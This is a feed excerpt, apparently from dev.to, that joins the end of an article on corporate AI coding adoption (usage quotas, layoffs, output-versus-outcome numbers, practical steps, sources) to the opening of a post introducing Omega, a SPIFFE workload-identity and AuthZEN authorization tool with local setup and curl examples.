&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The structural problem is the obvious one: &lt;strong&gt;senior engineers were once junior engineers&lt;/strong&gt;. The pipeline that turns 0-year-experience people into 5-10-year people is being shut off right now. Stack Overflow's December 2025 "AI vs Gen Z" piece raised the same alarm directly. "Cut the work AI can do" sounds rational on its own, but the same logic causes a senior shortage in 3 to 5 years.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.4 Side effects of "AI usage as a quota"
&lt;/h3&gt;

&lt;p&gt;Meta is the canonical case. "65% of Creation Org engineers should write 75%+ of their code via AI" is &lt;strong&gt;functionally a quota at the floor level&lt;/strong&gt;, even if it's framed otherwise. The same period Meta has been pushing layoffs of up to 15,000 (~20% of headcount), with reports of a Reality Labs unit (~1,000 people) restructured into new roles ("AI Builder," "AI Pod Lead," "AI Org Lead").&lt;/p&gt;

&lt;p&gt;Metric distortion is the failure mode here. If you optimize "amount of AI used," people &lt;strong&gt;route work through AI even when it doesn't help&lt;/strong&gt;, just to hit the target. The thing you actually wanted to measure was "AI improved quality or speed," and that's a much harder number. Meta's PR position is that the framing is outcome-based, but the field-level risk of it being run as a literal quota gets flagged consistently.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.5 Each company's specific pain, in one line
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Company&lt;/th&gt;
&lt;th&gt;Headline number&lt;/th&gt;
&lt;th&gt;What's going wrong underneath&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Google&lt;/td&gt;
&lt;td&gt;75% AI-gen code&lt;/td&gt;
&lt;td&gt;Two-tier (official Gemini, internal Claude) needs to resolve somehow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft / GitHub&lt;/td&gt;
&lt;td&gt;Coding Agent&lt;/td&gt;
&lt;td&gt;Token-based billing in June 2026 is unpopular and hard to budget for&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Meta&lt;/td&gt;
&lt;td&gt;DevMate 50% PRs&lt;/td&gt;
&lt;td&gt;AI-usage targets are paired with massive layoffs, so the field reads it as a quota&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Amazon&lt;/td&gt;
&lt;td&gt;4,500 person-yrs&lt;/td&gt;
&lt;td&gt;Q Developer signups stop May 15 2026, migration cost to Kiro for everyone (internal/external)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Anthropic&lt;/td&gt;
&lt;td&gt;Most code by Claude&lt;/td&gt;
&lt;td&gt;The 6-week quality regression in Apr 2026, demand consistently outrunning compute&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stripe&lt;/td&gt;
&lt;td&gt;1,300 PRs/week&lt;/td&gt;
&lt;td&gt;Slopsquatting and quality bugs scale with PR throughput&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Salesforce&lt;/td&gt;
&lt;td&gt;$100M saved&lt;/td&gt;
&lt;td&gt;Tier 1/2 automation shrinks the human-operator career path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Shopify&lt;/td&gt;
&lt;td&gt;Reflexive AI usage&lt;/td&gt;
&lt;td&gt;"Prove AI can't" closes the entry door for juniors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Netflix&lt;/td&gt;
&lt;td&gt;Pipeline -70%&lt;/td&gt;
&lt;td&gt;The conversational UI shift may change how serendipitous discovery actually works&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mercari&lt;/td&gt;
&lt;td&gt;95% AI usage&lt;/td&gt;
&lt;td&gt;ASDD has to actually become the org-wide standard, plus 100-person Task Force overhead&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CyberAgent&lt;/td&gt;
&lt;td&gt;60% workload cut&lt;/td&gt;
&lt;td&gt;In-house LLM upkeep cost; if the gap to foreign frontier models widens, what's plan B?&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Behind every flashy number, a specific liability is accumulating. "Just bet everything on AI" is piling up other kinds of debt (junior pipeline, vendor lock-in, metric games), and you can see it in each company.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.6 Output numbers are huge, outcome numbers aren't, people still get cut
&lt;/h3&gt;

&lt;p&gt;This is the part that doesn't add up.&lt;/p&gt;

&lt;p&gt;The flashy numbers from the 11 companies above are almost all on the &lt;strong&gt;output side&lt;/strong&gt;: code generated, PRs filed, costs cut, usage rates. On the &lt;strong&gt;outcome side&lt;/strong&gt; (revenue, market share, user satisfaction), it's much harder to point at an "the world has clearly shifted" example as of May 2026.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Company&lt;/th&gt;
&lt;th&gt;Output (the loud number)&lt;/th&gt;
&lt;th&gt;Outcome (any clear, AI-attributable shift in business?)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Google&lt;/td&gt;
&lt;td&gt;75% AI-gen code&lt;/td&gt;
&lt;td&gt;AI Overviews CTR is trending down, ad revenue flat, antitrust suits ongoing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Meta&lt;/td&gt;
&lt;td&gt;DevMate 50% PRs&lt;/td&gt;
&lt;td&gt;Stock pressured by AI capex worries, Reality Labs still bleeding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft&lt;/td&gt;
&lt;td&gt;Copilot Coding Agent&lt;/td&gt;
&lt;td&gt;Azure depends on OpenAI, Copilot revenue swinging on the billing-model change&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Amazon&lt;/td&gt;
&lt;td&gt;4,500 person-years saved&lt;/td&gt;
&lt;td&gt;Q Developer is being shrunk and rolled into Kiro; product strategy keeps shifting&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stripe&lt;/td&gt;
&lt;td&gt;1,300 PRs/week&lt;/td&gt;
&lt;td&gt;IPO timing pushed back, no public number on revenue effect&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Salesforce&lt;/td&gt;
&lt;td&gt;$100M saved&lt;/td&gt;
&lt;td&gt;ARR growth has slowed; the stock moved on Agentforce expectations, not yet results&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mercari&lt;/td&gt;
&lt;td&gt;95% adoption, +64% output&lt;/td&gt;
&lt;td&gt;GMV growth and margin haven't shown the same kind of step change&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The only places I can point at as "actually transformed" are the &lt;strong&gt;companies selling AI tools&lt;/strong&gt;. Cursor went from a few hundred million ARR to roughly $2B in a single year. Anthropic's revenue is on a similar curve. &lt;strong&gt;Companies deploying AI inside their business&lt;/strong&gt; can't yet point at anything that obvious.&lt;/p&gt;

&lt;h4&gt;
  
  
  And yet the layoffs are at a scale we haven't seen before
&lt;/h4&gt;

&lt;p&gt;That's the strange part. Outcomes aren't in, but headcount cuts are accelerating. Meta up to 15,000 (~20%), Microsoft 9,000 in 2025 alone, Salesforce, Amazon, Google all rolling.&lt;/p&gt;

&lt;p&gt;I don't think there's one reason. Four motives are running simultaneously:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Motive&lt;/th&gt;
&lt;th&gt;What it actually means&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;(1) Offsetting AI capex&lt;/td&gt;
&lt;td&gt;Meta alone has $135B-scale AI capex plans. GPU/TPU power bills rival headcount cost. Something has to give&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(2) Catch-up on prior overhiring&lt;/td&gt;
&lt;td&gt;The zero-interest-period headcount boom of 2022-2023 (Meta added tens of thousands in 2022) is now being unwound under an AI banner&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(3) Efficiency narrative for shareholders&lt;/td&gt;
&lt;td&gt;With capex this loud, you need a parallel story of "we're cutting costs" to keep investors comfortable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(4) A bet on three years out&lt;/td&gt;
&lt;td&gt;"When AI actually pays off, we don't want to be sitting on a high-cost org," so you cut now without waiting for outcomes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;There's also the historical pattern. When productivity spikes, demand usually expands and &lt;strong&gt;people end up needing more workers, not fewer&lt;/strong&gt; (steam engine, PCs, spreadsheets). That's Jevons Paradox. If AI plays out the same way, generating 3x more code should mean reviewers and architects become the bottleneck, not surplus. The current corporate moves either ignore that paradox or are betting on getting ahead of it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flw4f22zmgm4501j0svmf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flw4f22zmgm4501j0svmf.png" alt="output" width="800" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That loop has been spinning since 2025. The "business outcome" box on the right, though, no one can answer yet (which company, what number, when). When you're reading the loud numbers in this article, keep in mind they're all &lt;strong&gt;output&lt;/strong&gt; numbers. The outcome numbers haven't caught up.&lt;/p&gt;




&lt;h2&gt;
  
  
  9. What you can actually do at your shop
&lt;/h2&gt;

&lt;p&gt;By the time you get here, the natural question is: "ok, what do I do tomorrow?" Here's what I'd order, by entry difficulty.&lt;/p&gt;

&lt;p&gt;The 2026 baseline assumption is: &lt;strong&gt;using Cursor / Claude Code / Copilot daily doesn't count as "pushing forward" anymore&lt;/strong&gt;. You need a step past that.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Time horizon&lt;/th&gt;
&lt;th&gt;What to do&lt;/th&gt;
&lt;th&gt;Difficulty&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;This week&lt;/td&gt;
&lt;td&gt;Hook one internal tool (Slack / Jira / wiki / DB) up over MCP. Refresh &lt;code&gt;CLAUDE.md&lt;/code&gt; / &lt;code&gt;AGENTS.md&lt;/code&gt;. Try Auto Mode / subagents in parallel&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;This quarter&lt;/td&gt;
&lt;td&gt;Stand up one production line where Copilot Coding Agent or Claude Code takes Issues and ships PRs. Ship one RAG-based internal search to production&lt;/td&gt;
&lt;td&gt;Mid&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6 months to 1 year&lt;/td&gt;
&lt;td&gt;Rewrite specs for agents (Mercari-style ASDD). Ship one L2 cost-saving number (a routine report, test backfill, etc.)&lt;/td&gt;
&lt;td&gt;Mid-high&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Needs leadership decision&lt;/td&gt;
&lt;td&gt;Wire AI usage into evaluations (Shopify-style). Stand up an AI Task Force-equivalent&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;In plain terms:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Push L1 past where it's stuck&lt;/strong&gt;. Don't stop at "I use Cursor." This week: hook one internal tool over MCP, run subagents in parallel, kick the tires on Auto Mode. None of these need special permission and they're standard 2026 work&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Produce one L2 cost number&lt;/strong&gt;. Amazon's 4,500 person-years and Mercari's 4,000 workflows started from one item. "I agentized this routine report and it freed up 10 hours a week" reframes the conversation in your team&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Find one customer-facing thing to redo at L3&lt;/strong&gt;. Existing support, search, recommendations, form filling. Somewhere there's a place where "swap in an LLM" actually changes the experience. Salesforce's $100M didn't start at $100M. It started with one Tier 1 auto-response use case&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;L4 needs leadership air cover&lt;/strong&gt;. Wiring AI use into evals is a leadership-level decision and you can't unilaterally do it as an engineer. What you can do is package the case ("Shopify and Mercari are headed here, why not us") with data and walk it upstairs&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Closing
&lt;/h2&gt;

&lt;p&gt;The era where "are you using AI?" / "yes" was a complete answer is probably ending in 2026.&lt;/p&gt;

&lt;p&gt;What ties the 11 companies in this article together is that they made &lt;strong&gt;AI use a property of the organization, not a habit of an individual&lt;/strong&gt;. Google's 75%, Stripe's 1,300 PRs a week, Mercari's 95% are not the result of individuals working harder. They're the result of organizations making weird, expensive bets ("we're going to design code review around AI authoring," "we're putting 100 people on an AI Task Force," "we're rewriting how we write specs around ASDD"). None of those just happen.&lt;/p&gt;

&lt;p&gt;The flip side: nothing in this article is reachable through "individuals trying harder." The question becomes where to plant a wedge in your org so the team can move the same direction. I hope this article works as a catalog for that.&lt;/p&gt;

&lt;p&gt;If you can bring one small L2 number to your standup tomorrow, in addition to the usual L1 chatter, you'll change the frame of the conversation.&lt;/p&gt;




&lt;h2&gt;
  
  
  Sources (first-party where possible)
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://newsletter.pragmaticengineer.com/p/ai-tooling-2026" rel="noopener noreferrer"&gt;AI Tooling for Software Engineers in 2026 (Pragmatic Engineer survey, Feb 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/cloud-next-2026-sundar-pichai/" rel="noopener noreferrer"&gt;Sundar Pichai shares news from Google Cloud Next 2026&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.businesstoday.in/technology/story/google-engineers-turn-to-anthropics-claude-code-amid-internal-challenges-526856-2026-04-22" rel="noopener noreferrer"&gt;Google engineers turn to Anthropic's Claude Code amid internal challenges (BusinessToday, Apr 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://news.aibase.com/news/24207" rel="noopener noreferrer"&gt;Google chief engineer publicly praises Claude Code (Jaana Dogan post, Jan 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.anthropic.com/news/google-broadcom-partnership-compute" rel="noopener noreferrer"&gt;Anthropic expands partnership with Google and Broadcom (Anthropic)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www-cdn.anthropic.com/58284b19e702b49db9302d5b6f135ad8871e7658.pdf" rel="noopener noreferrer"&gt;How Anthropic teams use Claude Code (PDF)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.infoq.com/news/2026/05/anthropic-claude-code-auto-mode/" rel="noopener noreferrer"&gt;Inside Claude Code Auto Mode (InfoQ, May 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://linearb.io/blog/meta-ai-control-plane-james-everingham-guildai" rel="noopener noreferrer"&gt;Meta builds the agentic infrastructure that drives 50% of its code changes (LinearB)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.blog/news-insights/company-news/build-an-agent-into-any-app-with-the-github-copilot-sdk/" rel="noopener noreferrer"&gt;Build an agent into any app with the GitHub Copilot SDK (GitHub Blog)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/orgs/community/discussions/192948" rel="noopener noreferrer"&gt;GitHub Copilot is moving to usage-based billing (GitHub Discussions)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://aws.amazon.com/blogs/devops/april-2025-amazon-q-developer/" rel="noopener noreferrer"&gt;April 2025: A month of innovation for Amazon Q Developer (AWS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://aws.amazon.com/blogs/devops/amazon-q-developer-end-of-support-announcement/" rel="noopener noreferrer"&gt;Amazon Q Developer end-of-support announcement (AWS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://stripe.dev/blog/minions-stripes-one-shot-end-to-end-coding-agents-part-2" rel="noopener noreferrer"&gt;Stripe Minions: one-shot, end-to-end coding agents Part 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cursor.com/blog/stripe" rel="noopener noreferrer"&gt;Cursor: Stripe customer story&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://x.com/tobi/status/1909251946235437514" rel="noopener noreferrer"&gt;Tobi Lütke: Reflexive AI usage at Shopify (X)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://fortune.com/2026/04/18/salesforce-agentforce-ai-efficiency-revenue-growth/" rel="noopener noreferrer"&gt;Salesforce Agentforce: Fortune coverage (Apr 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://prs2025.splashthat.com/" rel="noopener noreferrer"&gt;Netflix Personalization, Recommendation and Search Workshop 2025&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://engineering.mercari.com/blog/entry/20251201-pj-double-towards-ai-native-development/" rel="noopener noreferrer"&gt;Mercari Engineering: pj-double, ASDD and the AI-Native shift&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://engineering.mercari.com/blog/entry/20251225-mercari-ai-native-company/" rel="noopener noreferrer"&gt;Mercari Engineering: choosing AI-Native&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cyberagent.co.jp/news/detail/id=29442" rel="noopener noreferrer"&gt;CyberAgent: launching the AI Operations Office&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.anthropic.com/engineering/april-23-postmortem" rel="noopener noreferrer"&gt;Anthropic: an update on recent Claude Code quality reports (Apr 23 postmortem)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.infosecurity-magazine.com/news/ai-hallucinations-slopsquatting/" rel="noopener noreferrer"&gt;AI hallucinations create "slopsquatting" supply chain threat (Infosecurity Magazine)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.csoonline.com/article/4167465/supply-chain-attacks-take-aim-at-your-ai-coding-agents.html" rel="noopener noreferrer"&gt;Supply-chain attacks take aim at your AI coding agents (CSO Online)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://stackoverflow.blog/2025/12/26/ai-vs-gen-z/" rel="noopener noreferrer"&gt;AI vs Gen Z: how AI has changed the career pathway for junior developers (Stack Overflow Blog)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cio.com/article/4062024/demand-for-junior-developers-softens-as-ai-takes-over.html" rel="noopener noreferrer"&gt;Demand for junior developers softens as AI takes over (CIO)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.peoplematters.in/news/ai-and-emerging-tech/meta-sets-ai-coding-targets-with-some-teams-aiming-for-75percent-usage-49016" rel="noopener noreferrer"&gt;Meta sets AI coding targets, with some teams aiming for 75% usage (People Matters)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://openai.com/index/introducing-codex/" rel="noopener noreferrer"&gt;Introducing Codex (OpenAI)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://openai.com/codex/" rel="noopener noreferrer"&gt;Codex AI Coding Partner (OpenAI product page)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://openai.com/index/introducing-gpt-5-5/" rel="noopener noreferrer"&gt;Introducing GPT-5.5 (OpenAI)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>productivity</category>
      <category>engineering</category>
      <category>llm</category>
    </item>
    <item>
      <title>Introducing Omega: SPIFFE Workload Identity + AuthZEN Authorization in a Single Binary</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Fri, 01 May 2026 15:22:55 +0000</pubDate>
      <link>https://dev.to/kanywst/introducing-omega-spiffe-workload-identity-authzen-authorization-in-a-single-binary-48j0</link>
      <guid>https://dev.to/kanywst/introducing-omega-spiffe-workload-identity-authzen-authorization-in-a-single-binary-48j0</guid>
      <description>&lt;p&gt;Standing up workload identity in a real cluster usually means running&lt;br&gt;
four projects: SPIRE for SVID issuance, OPA or Cedar for authorization,&lt;br&gt;
an OIDC provider for federation, and a separate audit pipeline.&lt;/p&gt;

&lt;p&gt;The standards finally caught up. OpenID AuthZEN Authorization API 1.0&lt;br&gt;
was &lt;a href="https://openid.net/authorization-api-1-0-final-specification-approved/" rel="noopener noreferrer"&gt;approved as a Final Specification on 2026-01-12&lt;/a&gt;.&lt;br&gt;
Cedar &lt;a href="https://aws.amazon.com/blogs/opensource/cedar-joins-cncf-as-a-sandbox-project/" rel="noopener noreferrer"&gt;joined CNCF Sandbox on 2025-10-08&lt;/a&gt;&lt;br&gt;
and is in production at Cloudflare, MongoDB, StrongDM, and AWS Bedrock&lt;br&gt;
AgentCore. SPIFFE is the de-facto workload identity model.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/0-draft/omega" rel="noopener noreferrer"&gt;Omega&lt;/a&gt; is my attempt at wiring those&lt;br&gt;
pieces into one Apache-2.0 binary.&lt;/p&gt;
&lt;h2&gt;
  
  
  A few terms first
&lt;/h2&gt;

&lt;p&gt;If any of these are unfamiliar, the rest of the article assumes them.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Term&lt;/th&gt;
&lt;th&gt;One-line definition&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SPIFFE&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;A spec for workload identity. Defines &lt;code&gt;spiffe://trust-domain/path&lt;/code&gt; IDs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SVID&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SPIFFE Verifiable Identity Document. Either an X.509 cert or a JWT.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Workload API&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;A local gRPC endpoint a workload calls to fetch its current SVID.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;PDP / PEP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Policy Decision Point answers "allow?". Policy Enforcement Point asks the question.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AuthZEN&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;An OpenID spec for the HTTP+JSON wire format between a PEP and a PDP.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cedar&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;A small, analyzable policy language from AWS, now CNCF Sandbox.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h2&gt;
  
  
  What Omega is
&lt;/h2&gt;

&lt;p&gt;One binary with three subcommands:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;omega server&lt;/code&gt; runs the control plane: a CA that issues SPIFFE
X.509-SVIDs and JWT-SVIDs, an AuthZEN 1.0 PDP backed by Cedar, an
audit log, and SPIFFE federation.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;omega agent&lt;/code&gt; runs the SPIFFE Workload API on a Unix domain socket
and attests workloads by their UID via &lt;code&gt;peercred&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;omega &amp;lt;CRUD&amp;gt;&lt;/code&gt; is the CLI for domains, policies, and SVIDs.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;
  
  
  What ships today
&lt;/h2&gt;

&lt;p&gt;Repo: &lt;a href="https://github.com/0-draft/omega" rel="noopener noreferrer"&gt;https://github.com/0-draft/omega&lt;/a&gt;. Items marked &lt;code&gt;tracked&lt;/code&gt; are&lt;br&gt;
GitHub issues, not features in the source tree.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SPIFFE X.509-SVID&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SPIFFE JWT-SVID (JWKS)&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AuthZEN 1.0 PDP (Cedar)&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SPIFFE federation&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tamper-evident audit&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Postgres backend (HA)&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes operator&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;cert-manager Issuer&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Admin UI&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI agent delegation&lt;/td&gt;
&lt;td&gt;example&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OIDC IdP federation hub&lt;/td&gt;
&lt;td&gt;tracked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CSI driver&lt;/td&gt;
&lt;td&gt;tracked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PQC (ML-DSA / ML-KEM)&lt;/td&gt;
&lt;td&gt;tracked&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h2&gt;
  
  
  60-second hands-on
&lt;/h2&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/0-draft/omega
&lt;span class="nb"&gt;cd &lt;/span&gt;omega
make docker-up
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;That brings up the control plane on &lt;code&gt;:8080&lt;/code&gt;, two node agents (giving&lt;br&gt;
the same UID two distinct SPIFFE IDs over separate sockets), the&lt;br&gt;
&lt;code&gt;hello-svid&lt;/code&gt; server and client (which mTLS-handshakes and prints the&lt;br&gt;
verified peer SPIFFE ID), and the admin dashboard on &lt;code&gt;:3000&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Hit the AuthZEN endpoint:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="nt"&gt;-sS&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://127.0.0.1:8080/access/v1/evaluation &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s1"&gt;'Content-Type: application/json'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'{"subject":{"type":"Spiffe","id":"spiffe://omega.local/example/web"},
       "action":{"name":"GET"},
       "resource":{"type":"HttpPath","id":"/api/foo"}}'&lt;/span&gt;
&lt;span class="c"&gt;# {"decision":false}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



